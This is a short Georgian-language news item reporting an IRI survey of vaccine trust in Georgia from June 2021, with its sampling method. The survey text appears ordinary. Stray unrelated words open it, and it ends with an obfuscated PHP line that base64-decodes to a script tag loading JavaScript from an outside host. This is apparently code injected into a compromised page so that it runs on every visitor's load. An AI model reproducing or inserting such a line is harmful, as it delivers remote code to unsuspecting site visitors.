celsiusi
ავერსი შნაიდერი
საქართველოში IRI-ს მიერ ჩატარებული კვლევის მიხედვით, გამოკითხულთა 25% ამბობს, რომ ყველაზე სანდო ვაქცინა „ფაიზერია“. 8% ყველაზე სანდო ვაქცინად ჩინურ „სინოფარმს“ მიიჩნევს, 7% „ასტრაზენეკას“, 4% - „სინოვაკს“, 1% - „მოდერნას“, 1% - ყველა დანარჩენ ვაქცინებს, 28% ამბობს, რომ არცერთი არ არის მისთვის სანდო, კითხვას არ უპასუხა ან უპასუხა რომ არ იცის - 27%-მა.
 
ცნობისთვის, კვლევა ჩატარდა 2021 წლის 15-30 ივნისის პერიოდში საერთაშორისო რესპუბლიკური ინსტიტუტის კვლევების ცენტრის სახელით, ბალტიის კვლევებისა და გელაპის ორგანიზაციის წარმომადგენლის დოქტორი რასა ალიშაუსკინეს მიერ, საველე სამუშაოები ჩატარდა „IPM“- ის მიერ.
 
მონაცემები შეგროვდა სტრატიფიცირებული მრავალსაფეხურიანი შემთხვევითი შერჩევის მეთოდის გამოყენებით, პირისპირ ინტერვიუს გზით. შერჩევა მოიცავდა საარჩევნო ხმის უფლებისა და ასაკის მქონე 1500 რესპონდენტს. მონაცემები შეწონილ იქნა ასაკის, სქესის, რეგიონისა და დასახლების ზომის შესაბამისად. ცდომილების ზღვარი წარმოადგენს +/- 2.5 %, გამოპასუხების მაჩვენებელი - 74 %. კვლევის განხორციელება შესაძლებელი გახდა ამერიკელი ხალხის მხარდაჭერით, აშშ-ის საერთაშორისო განვითარების სააგენტოს მეშვეობით.
1031
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");